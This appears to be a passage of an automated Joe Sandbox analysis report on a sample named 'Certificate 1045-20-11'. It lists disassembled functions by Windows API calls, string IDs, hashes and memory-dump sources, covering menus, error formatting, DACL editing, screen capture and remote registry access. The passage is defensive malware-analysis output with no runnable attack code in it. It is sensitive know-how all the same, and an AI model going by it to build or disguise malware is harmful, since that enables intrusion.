                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1148790751-4113822522
                                                                                • Opcode ID: 0f0d66ad284df4bcd51cca67b7da1b0eadd6946e3551d05ddd5cec7e42aedd82
                                                                                • Instruction ID: 560ba17c5bc2e00765d52ac2a316b3a992f3fa6dea7fb8507b6e0ad913ccf2d9
                                                                                • Opcode Fuzzy Hash: 0f0d66ad284df4bcd51cca67b7da1b0eadd6946e3551d05ddd5cec7e42aedd82
                                                                                • Instruction Fuzzy Hash: 89512C711047099FC700EF25C98196EB7E8FF95758F10486DF895A7291EB31EE0ACB52
                                                                                Function 008826BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,008B3973,00000016,0000138C,00000016,?,00000016,008DDDB4,00000000,?), ref: 008826F1
                                                                                • LoadStringW.USER32(00000000,?,008B3973,00000016), ref: 008826FA
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,008B3973,00000016,0000138C,00000016,?,00000016,008DDDB4,00000000,?,00000016), ref: 0088271C
                                                                                • LoadStringW.USER32(00000000,?,008B3973,00000016), ref: 0088271F
                                                                                • __swprintf.LIBCMT ref: 0088276F
                                                                                • __swprintf.LIBCMT ref: 00882780
                                                                                • _wprintf.LIBCMT ref: 00882829
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00882840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 618562835-2268648507
                                                                                • Opcode ID: e91d13ac2742814318b51048df0e7ee6b1f38f7228e78ac0044f3a79e548db78
                                                                                • Instruction ID: 3ef3ebace2e1f576be91dabfa9b7dd4c667cd679e9974bb5eb74135c4abe4e30
                                                                                • Opcode Fuzzy Hash: e91d13ac2742814318b51048df0e7ee6b1f38f7228e78ac0044f3a79e548db78
                                                                                • Instruction Fuzzy Hash: E741E87280021DAACF14FBA8DD86EEEB778FF14344F100065B601F6192EA746F59CB62
                                                                                Function 0088D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0088D0D8
                                                                                • __swprintf.LIBCMT ref: 0088D0FA
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0088D137
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0088D15C
                                                                                • _memset.LIBCMT ref: 0088D17B
                                                                                • _wcsncpy.LIBCMT ref: 0088D1B7
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0088D1EC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0088D1F7
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0088D200
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0088D20A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: c5c5ca7c180cafba1d8cc1f5fa0deec0b2971be343ea290094b5607e98bcdc4e
                                                                                • Instruction ID: 2dbfa9079004e1bc86fb6599ff486a649c33feefd0170edd5cb4212865fd5703
                                                                                • Opcode Fuzzy Hash: c5c5ca7c180cafba1d8cc1f5fa0deec0b2971be343ea290094b5607e98bcdc4e
                                                                                • Instruction Fuzzy Hash: 54318076500209ABDB21EFA4DC49FAB77BDFF88740F1040B6F509D21A1E770A6458B25
                                                                                Function 008787CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                • String ID:
                                                                                • API String ID: 884005220-0
                                                                                • Opcode ID: 36d211f121c500aeb4ac6f121e488fe96c403c3f115f2e67454ba85a7467fdac
                                                                                • Instruction ID: 1626a0a110c2de00d5d66a4358117f2740e168170d14de3994017ca9cf5239f6
                                                                                • Opcode Fuzzy Hash: 36d211f121c500aeb4ac6f121e488fe96c403c3f115f2e67454ba85a7467fdac
                                                                                • Instruction Fuzzy Hash: 3761F432988215EFDB205F28DC49B797BA4FF01324F258125E819EB19AEF34C94097A7
                                                                                Function 008AE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 008AE754
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 008AE76B
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008AE776
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008AE783
                                                                                • GlobalLock.KERNEL32(00000000), ref: 008AE78C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008AE79B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 008AE7A4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008AE7AB
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008AE7BC
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,008CD9BC,?), ref: 008AE7D5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 008AE7E5
                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 008AE809
                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 008AE834
                                                                                • DeleteObject.GDI32(00000000), ref: 008AE85C
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008AE872
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 41750e2ca59616e3a3dd7bea96374e3679c524d30d266f80df5d41ae2450eb08
                                                                                • Instruction ID: e5ceb4bd6935bd45acb0469f23242383e714fd3ab64307d0e24b9847ac2934d6
                                                                                • Opcode Fuzzy Hash: 41750e2ca59616e3a3dd7bea96374e3679c524d30d266f80df5d41ae2450eb08
                                                                                • Instruction Fuzzy Hash: 27412975600308EFDB11AF65DC88EAABBB8FF8A715F108468F905D7260D774A941DB60
                                                                                Function 008905F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __wsplitpath.LIBCMT ref: 0089076F
                                                                                • _wcscat.LIBCMT ref: 00890787
                                                                                • _wcscat.LIBCMT ref: 00890799
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008907AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008907C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 008907DA
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 008907F4
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                • String ID: *.*
                                                                                • API String ID: 34673085-438819550
                                                                                • Opcode ID: 51c4b2b1eda34635834077782330f679405146328d971a3c23fa21b454454d29
                                                                                • Instruction ID: b316dd8325167e809809d55106f86ce3512f8650abe68d4bbbb045be3b2e95b2
                                                                                • Opcode Fuzzy Hash: 51c4b2b1eda34635834077782330f679405146328d971a3c23fa21b454454d29
                                                                                • Instruction Fuzzy Hash: 48819E716043059FCF24EF68C84596EB7E8FB99314F18882EF989D7251EB30E9548F92
                                                                                Function 008AEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008AEF3B
                                                                                • GetFocus.USER32 ref: 008AEF4B
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 008AEF56
                                                                                • _memset.LIBCMT ref: 008AF081
                                                                                • GetMenuItemInfoW.USER32 ref: 008AF0AC
                                                                                • GetMenuItemCount.USER32(00000000), ref: 008AF0CC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 008AF0DF
                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 008AF113
                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 008AF15B
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008AF193
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 008AF1C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1296962147-4108050209
                                                                                • Opcode ID: 1c12f7e8d1b6ed596e60c3431bd80371d37eb41ae81c4e54aa80081d96f61c91
                                                                                • Instruction ID: 6d5676d730dfc9ebc9075c06ed68cba89a29c93fff401b8307415e6aaf2ae3fa
                                                                                • Opcode Fuzzy Hash: 1c12f7e8d1b6ed596e60c3431bd80371d37eb41ae81c4e54aa80081d96f61c91
                                                                                • Instruction Fuzzy Hash: 4C818C71108305AFEB21DF58C884E6BBBE8FB89314F00492EFA95D7692D771D905CB92
                                                                                Function 0087A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
                                                                                  • Part of subcall function 0087ABBB: GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
                                                                                  • Part of subcall function 0087ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
                                                                                  • Part of subcall function 0087ABBB: HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
                                                                                  • Part of subcall function 0087ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
                                                                                  • Part of subcall function 0087AC56: GetProcessHeap.KERNEL32(00000008,0087A6B5,00000000,00000000,?,0087A6B5,?), ref: 0087AC62
                                                                                  • Part of subcall function 0087AC56: HeapAlloc.KERNEL32(00000000,?,0087A6B5,?), ref: 0087AC69
                                                                                  • Part of subcall function 0087AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0087A6B5,?), ref: 0087AC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0087A8CB
                                                                                • _memset.LIBCMT ref: 0087A8E0
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0087A8FF
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A910
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0087A94D
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087A969
                                                                                • GetLengthSid.ADVAPI32(?), ref: 0087A986
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0087A995
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0087A99C
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0087A9BD
                                                                                • CopySid.ADVAPI32(00000000), ref: 0087A9C4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0087A9F5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0087AA1B
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0087AA2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: 7d2254f6691ff1fb15b4bbe4773dc6d6af86baaa6f7f2617858754e315f233bc
                                                                                • Instruction ID: 2b2fdc9e5b91c817888efe31df07bd00fcbab42cd182390425d65c6e8f2229e1
                                                                                • Opcode Fuzzy Hash: 7d2254f6691ff1fb15b4bbe4773dc6d6af86baaa6f7f2617858754e315f233bc
                                                                                • Instruction Fuzzy Hash: B0514975900219ABDF05DF94DC84EEEBBB9FF44300F048129F919EA290DB30DA05CB61
                                                                                Function 00899DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00899E36
                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00899E42
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00899E4E
                                                                                • SelectObject.GDI32(00000000,?), ref: 00899E5B
                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00899EAF
                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00899EEB
                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00899F0F
                                                                                • SelectObject.GDI32(00000006,?), ref: 00899F17
                                                                                • DeleteObject.GDI32(?), ref: 00899F20
                                                                                • DeleteDC.GDI32(00000006), ref: 00899F27
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00899F32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: 066f1ead7f14704de613e814f079c892a16aff688234118f69658b161ddf3bfc
                                                                                • Instruction ID: ae3ed6afaba5f31e963addfee412ccb86fc61ef62a30d50ebc11371d01727e20
                                                                                • Opcode Fuzzy Hash: 066f1ead7f14704de613e814f079c892a16aff688234118f69658b161ddf3bfc
                                                                                • Instruction Fuzzy Hash: 8F513975900309EFCB14DFA8D885EAEBBB9FF48310F18842DF999A7210D771A941CB90
                                                                                Function 0088CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-2391861430
                                                                                • Opcode ID: 3c08fc9a01389f057fd1f7cd0eed51a6ed6cdac0663e57add9e8521b8cade9e1
                                                                                • Instruction ID: 3a8e3c7b6e2500fc74dae1e8c07f4431e7fb603c0336ed78bc0801001ff557e4
                                                                                • Opcode Fuzzy Hash: 3c08fc9a01389f057fd1f7cd0eed51a6ed6cdac0663e57add9e8521b8cade9e1
                                                                                • Instruction Fuzzy Hash: DE51383190020DAACB15FBA8CD46EEEB779FF08344F104166B505F21A2EB316E59DB62
                                                                                Function 0088CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-3420473620
                                                                                • Opcode ID: 4c11521cff07b2e50427caee1443c1ddf6cfb2a27a7e7124ad1f3456881ebb4a
                                                                                • Instruction ID: 6e22900c4eb5b344da8d1a7367402414eba04f7d9f76fd9fc54f7bb9b0e07599
                                                                                • Opcode Fuzzy Hash: 4c11521cff07b2e50427caee1443c1ddf6cfb2a27a7e7124ad1f3456881ebb4a
                                                                                • Instruction Fuzzy Hash: 3951573190060DAACF15EBA8CD46EEEB779FF04344F104066B505F21A2EB746F59DB62
                                                                                Function 008855BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008855D7
                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00885664
                                                                                • GetMenuItemCount.USER32(00901708), ref: 008856ED
                                                                                • DeleteMenu.USER32(00901708,00000005,00000000,000000F5,?,?), ref: 0088577D
                                                                                • DeleteMenu.USER32(00901708,00000004,00000000), ref: 00885785
                                                                                • DeleteMenu.USER32(00901708,00000006,00000000), ref: 0088578D
                                                                                • DeleteMenu.USER32(00901708,00000003,00000000), ref: 00885795
                                                                                • GetMenuItemCount.USER32(00901708), ref: 0088579D
                                                                                • SetMenuItemInfoW.USER32(00901708,00000004,00000000,00000030), ref: 008857D3
                                                                                • GetCursorPos.USER32(?), ref: 008857DD
                                                                                • SetForegroundWindow.USER32(00000000), ref: 008857E6
                                                                                • TrackPopupMenuEx.USER32(00901708,00000000,?,00000000,00000000,00000000), ref: 008857F9
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00885805
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3993528054-0
                                                                                • Opcode ID: cf2f91e16adffd70aea155995e8ae0319f90628950793d592ffa7e7953ba77c5
                                                                                • Instruction ID: 1e56241fc56a0bc854d8ca6980d453a83ead4fea975157fac03a2cc19e10a19f
                                                                                • Opcode Fuzzy Hash: cf2f91e16adffd70aea155995e8ae0319f90628950793d592ffa7e7953ba77c5
                                                                                • Instruction Fuzzy Hash: D971F170640A19BEEB21FB14CC49FAABF65FF10368F244216F618EA1D1D7706C10DB91
                                                                                Function 0087A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0087A1DC
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0087A211
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0087A22D
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0087A249
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0087A273
                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0087A29B
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0087A2A6
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0087A2AB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
